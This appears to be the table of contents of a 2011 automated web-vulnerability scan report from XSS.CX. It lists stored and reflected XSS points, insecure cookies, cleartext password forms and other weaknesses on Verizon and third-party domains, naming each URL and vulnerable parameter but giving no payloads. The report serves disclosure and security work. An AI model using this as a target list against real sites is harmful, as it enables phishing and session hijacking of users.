XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, NYSE:VZ

Phishing, Browser Hijacking, Stored XSS, Contaminated Search Results

Report generated by XSS.CX at Mon Sep 05 21:53:59 GMT-06:00 2011.

1. Cross-site scripting (stored)

1.1. http://search.verizon.com/ [vsrecentsearches cookie]

1.2. http://www22.verizon.com/residentialhelp/fiostv [ECSPCookies cookie]

1.3. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

2. Cross-site scripting (reflected)

2.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

2.2. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

2.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

2.4. https://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

2.5. https://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

2.6. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Source%20Title parameter]

2.7. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Source%20URL parameter]

2.8. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [initQ parameter]

2.9. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [lob parameter]

2.10. http://gigaom.com/cloud/structure-50/ [REST URL parameter 2]

2.11. http://media.verizon.com/media/scripts/widget.ashx [container parameter]

2.12. http://media.verizon.com/media/scripts/widget.ashx [widget parameter]

2.13. http://r.turn.com/server/beacon_call.js [b2 parameter]

2.14. http://s.xp1.ru4.com/meta [ssv_callback parameter]

2.15. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

2.16. http://search.verizon.com/ [name of an arbitrarily supplied request parameter]

2.17. https://signin.verizon.com/sso/VOLPortalLogin [goto parameter]

2.18. http://syndicate.verizon.net/ads/js.ashx [page parameter]

2.19. http://syndicate.verizon.net/ads/js.ashx [pos parameter]

2.20. http://syndicate.verizon.net/ads/scripthandler.ashx [source parameter]

2.21. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]

2.22. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver [nimlet parameter]

2.23. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.24. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.25. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

2.26. http://www.darkreading.com/security/attacks/showArticle.jhtml [REST URL parameter 2]

2.27. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

2.28. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

2.29. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]

2.30. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]

2.31. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]

2.32. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Referer HTTP header]

2.33. http://search.verizon.com/ [Referer HTTP header]

2.34. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.35. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.36. http://www.darkreading.com/security/attacks/showArticle.jhtml [User-Agent HTTP header]

2.37. http://search.verizon.com/ [vsrecentsearches cookie]

2.38. http://www22.verizon.com/residentialhelp/fiostv [ECSPCookies cookie]

2.39. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

2.40. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]

3. Flash cross-domain policy

3.1. http://ehg-verizon.hitbox.com/crossdomain.xml

3.2. http://g-pixel.invitemedia.com/crossdomain.xml

3.3. http://idcs.interclick.com/crossdomain.xml

3.4. http://pixel.mathtag.com/crossdomain.xml

3.5. http://pixel.quantserve.com/crossdomain.xml

3.6. http://r.turn.com/crossdomain.xml

3.7. http://s.xp1.ru4.com/crossdomain.xml

3.8. http://segment-pixel.invitemedia.com/crossdomain.xml

3.9. http://servedby.flashtalking.com/crossdomain.xml

3.10. http://statse.webtrendslive.com/crossdomain.xml

3.11. http://verizonwireless.tt.omtrdc.net/crossdomain.xml

3.12. http://cache.vzw.com/crossdomain.xml

3.13. http://www.verizonwireless.com/crossdomain.xml

3.14. http://www22.verizon.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://pixel.quantserve.com/clientaccesspolicy.xml

4.2. http://www22.verizon.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://cache.vzw.com/globalnav/globalnav.js

5.2. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

5.3. http://www.connecttoverizon.com/loginFailed.html

6. SSL cookie without secure flag set

6.1. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp

6.2. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

6.3. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx

6.4. https://adwords.google.com/um/StartNewLogin

6.5. https://auth.verizon.com/amserver/UI/Login

6.6. https://auth.verizon.net/amserver/UI/Login

6.7. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

6.8. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do

6.9. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js

6.10. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

6.11. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

6.12. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

6.13. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

6.14. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

6.15. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

6.16. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

6.17. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

6.18. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

6.19. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

6.20. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

6.21. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

6.22. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

6.23. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

6.24. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

6.25. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

6.26. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

6.27. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

6.28. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

6.29. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

6.30. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

6.31. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

6.32. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

6.33. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

6.34. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif

6.35. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif

6.36. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif

6.37. https://enterprisecenter.verizon.com/favicon.ico

6.38. https://mblogin.verizonwireless.com/amserver/UI/Login

6.39. https://signin.verizon.com/sso/VOLPortalLogin

6.40. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

6.41. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

6.42. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

6.43. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

6.44. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

6.45. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx

6.46. https://www22.verizon.com/images/body/gradientsectionhdr.gif

6.47. https://www22.verizon.com/images/headerfooter/bubbletranswhite.png

6.48. https://www22.verizon.com/images/headerfooter/scbsmbbodytile.gif

6.49. https://www22.verizon.com/images/headerfooter/scbsmbdivider.gif

6.50. https://www22.verizon.com/images/headerfooter/scbsmbdividerhoriz.gif

6.51. https://www22.verizon.com/images/headerfooter/scbsmbdividervert.gif

6.52. https://www22.verizon.com/images/headerfooter/scbsmbhoriztile.gif

6.53. https://www22.verizon.com/includes/cache/15/blank.html

6.54. https://www22.verizon.com/includes/cache/getwb31.asp

6.55. https://www22.verizon.com/includes/javascript/commonjs/

6.56. https://www22.verizon.com/includes/javascript/hbx.js/

6.57. https://www22.verizon.com/includes/javascript/hbx_custom.js/

6.58. https://www22.verizon.com/includes/javascript/sitewise.js/

6.59. https://www22.verizon.com/vztracker/vzTracker.aspx

7. Session token in URL

7.1. https://collaborateext.verizon.com/aims/encore/VZEncoreJSJVLoop.serv

7.2. https://collaborateext.verizon.com/aims/encore/VZEncorePostlet.serv

7.3. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

7.4. http://sales.liveperson.net/hc/2329305/

7.5. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

7.6. https://www22.verizon.com/ifederation/SmMakeCookie.ccc

8. Password field submitted using GET method

9. ASP.NET ViewState without MAC enabled

9.1. http://www22.verizon.com/ResidentialHelp/eRepairSigninPopup.aspx

9.2. http://www22.verizon.com/ResidentialHelp/iHAPopup/125612.htm

9.3. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx

9.4. http://www22.verizon.com/residentialhelp/Templates/layers/setpreferences.aspx

9.5. http://www22.verizon.com/residentialhelp/globalfooterhelp.aspx

9.6. http://www22.verizon.com/residentialhelp/globalheaderhelp.aspx

9.7. http://www22.verizon.com/residentialhelp/inhomeagent

9.8. http://www22.verizon.com/residentialhelp/inhomeagent/

9.9. http://www22.verizon.com/residentialhelp/usercontrols/SendEmail.aspx

9.10. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

9.11. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

10. Cookie without HttpOnly flag set

10.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

10.2. http://community.adobe.com/help/rm/sugg.html

10.3. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp

10.4. http://sales.liveperson.net/visitor/addons/deploy.asp

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp

10.6. http://sales.liveperson.net/visitor/addons/deploy.asp

10.7. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

10.8. http://www.verizonwireless.com/b2c/index.html

10.9. http://www22.verizon.com/content/verizonglobalhome/gpromo.aspx

10.10. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx

10.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/409.178.tk.88x31/0.10282370378263295

10.12. http://ad.yieldmanager.com/pixel

10.13. https://adwords.google.com/um/StartNewLogin

10.14. http://ak1.abmr.net/is/cache.vzw.com

10.15. http://ak1.abmr.net/is/www22.verizon.com

10.16. https://auth.verizon.com/amserver/UI/Login

10.17. https://auth.verizon.net/amserver/UI/Login

10.18. http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif

10.19. http://community.adobe.com/help/about.html

10.20. http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css

10.21. http://d.agkn.com/pixel!t=932!

10.22. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/

10.23. http://developer.verizon.com/favicon.ico

10.24. http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp

10.25. http://download.verizon.net/surround/media/misc/images/vidplayer_black_530x272.jpg

10.26. http://ehg-verizon.hitbox.com/HG

10.27. http://ehg-verizon.hitbox.com/HG

10.28. http://ehg-verizon.hitbox.com/HG

10.29. http://ehg-verizon.hitbox.com/HG

10.30. http://ehg-verizon.hitbox.com/HG

10.31. http://ehg-verizon.hitbox.com/HG

10.32. http://ehg-verizon.hitbox.com/HG

10.33. http://ehg-verizon.hitbox.com/HG

10.34. http://ehg-verizon.hitbox.com/HG

10.35. http://ehg-verizon.hitbox.com/HGct

10.36. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

10.37. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do

10.38. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js

10.39. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

10.40. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

10.41. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

10.42. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

10.43. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

10.44. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

10.45. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

10.46. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

10.47. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

10.48. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

10.49. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

10.50. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

10.51. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

10.52. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

10.53. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

10.54. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

10.55. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

10.56. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

10.57. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

10.58. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

10.59. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

10.60. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

10.61. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

10.62. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

10.63. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif

10.64. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif

10.65. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif

10.66. https://enterprisecenter.verizon.com/favicon.ico

10.67. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

10.68. http://g-pixel.invitemedia.com/gmatcher

10.69. http://get.adobe.com/cfusion/search/buddy/searchbuddy.cfm

10.70. http://get.adobe.com/flashplayer/

10.71. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/Core.jsp

10.72. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp

10.73. http://idcs.interclick.com/Segment.aspx

10.74. http://leadback.advertising.com/adcedge/lb

10.75. http://leadback.advertising.com/adcedge/lb

10.76. https://mblogin.verizonwireless.com/amserver/UI/Login

10.77. http://media.verizon.com/media/XmlProxy.ashx

10.78. http://media.verizon.com/media/scripts/widget.ashx

10.79. http://pixel.mathtag.com/event/img

10.80. http://r.turn.com/r/beacon

10.81. http://s.xp1.ru4.com/click

10.82. http://s.xp1.ru4.com/meta

10.83. http://s.xp1.ru4.com/meta

10.84. http://sales.liveperson.net/hc/2329305/

10.85. http://sales.liveperson.net/hc/2329305/

10.86. http://sales.liveperson.net/hc/2329305/

10.87. http://sales.liveperson.net/hc/2329305/cmd/url/

10.88. http://sales.liveperson.net/hc/44153975/

10.89. http://sales.liveperson.net/hc/44153975/

10.90. http://search.verizon.com/favicon.ico

10.91. http://servedby.flashtalking.com/segment/modify/adg

10.92. https://signin.verizon.com/sso/VOLPortalLogin

10.93. http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/dcs.gif

10.94. http://statse.webtrendslive.com/dcspfpx81frp17vzhd59b2lwc_3u6z/dcs.gif

10.95. http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx

10.96. http://syndicate.verizon.net/ads/regionlocator.ashx

10.97. http://tags.bluekai.com/site/4357

10.98. http://tap.tapad.com/audience/pxl.png

10.99. http://webmail.verizon.com/signin/

10.100. http://webmail.verizon.net/signin/

10.101. http://webmail.verizon.net/signin/Login.jsp

10.102. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s53773487436119

10.103. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s59195406346116

10.104. http://www.darkreading.com/security/attacks/showArticle.jhtml

10.105. http://www.facebook.com/dialog/feed

10.106. http://www.verizonbusiness.com/Medium/

10.107. http://www.verizonbusiness.com/Medium/about/promotions/first_6_months/

10.108. http://www.verizonbusiness.com/Medium/about/promotions/premium_data_center/

10.109. http://www.verizonbusiness.com/Medium/about/promotions/smp/

10.110. http://www.verizonbusiness.com/Medium/bundles/vsbb/

10.111. http://www.verizonbusiness.com/Medium/products/conferencing/

10.112. http://www.verizonbusiness.com/Medium/products/internet/ida/

10.113. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/video/

10.114. http://www.verizonbusiness.com/Medium/products/managed/managed_mobility/

10.115. http://www.verizonbusiness.com/Medium/sign-in/vec/

10.116. http://www.verizonbusiness.com/about/ipinnovation/

10.117. http://www.verizonbusiness.com/us/Products/networking/internet/ipv6/

10.118. http://www.verizonwireless.com/b2c/store/controller

10.119. http://www.verizonwireless.com/b2c/vzwfly

10.120. http://www.youtube.com/results

10.121. http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm

10.122. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx

10.123. http://www22.verizon.com/content/ContactUs/

10.124. http://www22.verizon.com/content/commontemplates/validlogin.aspx

10.125. http://www22.verizon.com/content/verizonglobalhome/Intermediate.aspx

10.126. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx

10.127. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

10.128. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js

10.129. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js

10.130. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js

10.131. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js

10.132. http://www22.verizon.com/onecms/vzcareers/includes/javascript/oo_engine.js

10.133. http://www22.verizon.com/residentialhelp/fiostv

10.134. http://www22.verizon.com/residentialhelp/inhomeagent

10.135. http://www22.verizon.com/residentialhelp/inhomeagent/

10.136. http://www22.verizon.com/residentialhelp/phone

10.137. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

10.138. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

10.139. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

10.140. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

10.141. https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx

10.142. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

10.143. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx

10.144. https://www22.verizon.com/includes/cache/15/blank.html

10.145. https://www22.verizon.com/includes/cache/getwb31.asp

10.146. https://www22.verizon.com/includes/javascript/commonjs/

10.147. https://www22.verizon.com/includes/javascript/hbx.js/

10.148. https://www22.verizon.com/includes/javascript/hbx_custom.js/

10.149. https://www22.verizon.com/includes/javascript/sitewise.js/

10.150. https://www22.verizon.com/vztracker/vzTracker.aspx

10.151. http://www35.vzw.com/HG

10.152. http://www35.vzw.com/HGct

11. Password field with autocomplete enabled

11.1. http://b2b.vzw.com/industrysolutions/index.html

11.2. https://dashboard.opinionlab.com/pv_controlboard.html

11.3. https://enterprisecenter.verizon.com/enterprisesolutions/default/CC/signIn.do

11.4. https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do

11.5. https://signin.verizon.com/sso/RetrieveUserID

11.6. http://webmail.verizon.com/signin/

11.7. http://webmail.verizon.net/signin/

11.8. http://webmail.verizon.net/signin/Login.jsp

11.9. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

11.10. http://www.connecttoverizon.com/

11.11. http://www.connecttoverizon.com/loginFailed.html

11.12. http://www.connecttoverizon.com/loginFailed.html

11.13. http://www.connecttoverizon.com/order-now.html

11.14. http://www.facebook.com/connect/prompt_feed.php

11.15. http://www.facebook.com/dialog/feed

11.16. https://www.google.com/accounts/ServiceLogin

11.17. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

11.18. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

12. Source code disclosure

12.1. http://business.verizon.net/SMBPortalWeb/resources/js/common.js

12.2. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf

12.3. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf

12.4. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf

12.5. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf

12.6. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf

12.7. http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf

12.8. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

12.9. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

12.10. http://static-business.verizon.net/SMBPortalWeb/resources/js/common.js

12.11. http://www22.verizon.com/Content/verizonglobalhome/Includes/Javascript/common.js

12.12. http://www22.verizon.com/Residentialhelp/includes/javascript/TopLevelTab.js

12.13. http://www22.verizon.com/content/contactus/includes/javascript/TopLevelTab.js

12.14. https://www22.verizon.com/Content/verizonglobalhome/Includes/Javascript/common.js

12.15. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js

13. Cross-domain POST

13.1. http://b2b.vzw.com/industrysolutions/index.html

13.2. http://b2b.vzw.com/industrysolutions/index.html

13.3. http://www.connecttoverizon.com/

13.4. http://www.connecttoverizon.com/

13.5. http://www.connecttoverizon.com/loginFailed.html

13.6. http://www.connecttoverizon.com/loginFailed.html

13.7. http://www.connecttoverizon.com/order-now.html

13.8. http://www.connecttoverizon.com/order-now.html

13.9. http://www.verizonwireless.com/b2c/aboutUs/affiliate/index.jsp

13.10. http://www.verizonwireless.com/b2c/index.html

14. Cookie scoped to parent domain

14.1. http://ak1.abmr.net/is/cache.vzw.com

14.2. http://ak1.abmr.net/is/www22.verizon.com

14.3. https://auth.verizon.com/amserver/UI/Login

14.4. https://auth.verizon.net/amserver/UI/Login

14.5. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

14.6. http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif

14.7. http://community.adobe.com/help/about.html

14.8. http://community.adobe.com/help/rm/sugg.html

14.9. http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css

14.10. http://d.agkn.com/pixel!t=932!

14.11. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/

14.12. http://download.verizon.net/surround/media/misc/images/vidplayer_black_530x272.jpg

14.13. http://ehg-verizon.hitbox.com/HG

14.14. http://ehg-verizon.hitbox.com/HGct

14.15. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

14.16. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do

14.17. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js

14.18. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

14.19. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

14.20. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

14.21. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

14.22. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

14.23. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

14.24. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

14.25. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

14.26. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

14.27. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

14.28. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

14.29. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

14.30. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

14.31. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

14.32. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

14.33. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

14.34. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

14.35. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

14.36. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

14.37. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

14.38. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

14.39. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

14.40. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

14.41. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

14.42. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif

14.43. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif

14.44. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif

14.45. https://enterprisecenter.verizon.com/favicon.ico

14.46. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

14.47. http://g-pixel.invitemedia.com/gmatcher

